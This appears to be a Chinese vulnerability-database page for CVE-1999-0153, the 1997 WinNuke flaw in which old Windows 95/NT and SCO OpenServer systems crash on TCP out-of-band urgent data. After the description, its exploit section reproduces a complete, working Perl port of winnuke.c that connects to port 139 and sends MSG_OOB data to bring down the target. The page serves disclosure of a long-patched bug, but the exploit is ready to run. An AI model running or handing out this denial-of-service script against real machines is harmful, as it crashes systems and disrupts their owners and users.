早期Windows系统TCP/IP OOB带外紧急数据拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105293 漏洞类型 未知
发布时间 1997-05-07 更新时间 2005-05-02
CVE编号 CVE-1999-0153 CNNVD-ID CNNVD-199707-008
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20439
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199707-008
|漏洞详情
TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。一些老版本的Windows系统不能很好的处理TCP紧急数据,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击,造成主机系统崩溃。1997年5月7号有人发布了一个winnuke.c。首先建立一条到Win95/NT主机的TCP连接,然后发送TCP紧急数据,导致系统崩溃。139/TCP是Win95/NT系统最常见的侦听端口,所以winnuke.c使用了该端口。之所以称呼这种攻击为OOB攻击,因为MSG_OOB标志,实际应该是TCP紧急数据攻击。<*链接:http://xforce.iss.net/static/173.phphttp://www.ciac.org/ciac/bulletins/h-57.shtml*>
|漏洞EXP
source: http://www.securityfocus.com/bid/2010/info
  
Older versions of Microsoft Windows (95, Windows for Workgroups 3.11, Windows NT up to and including 4.0), as well as SCO Open Server 5.0, have a vulnerability relating to the way they handle TCP/IP "Out of Band" data.
  
According to Microsoft, "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow. "
  
As a result of this assumption not being met, Windows gives a "blue screen of death" and stops responding.
  
Windows port 139 (NetBIOS) is most susceptible to this attack. although other services may suffer as well. Rebooting the affected machine is required to resume normal system functioning. 

#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;
|参考资料

来源:OSVDB
名称:1666
链接:http://www.osvdb.org/1666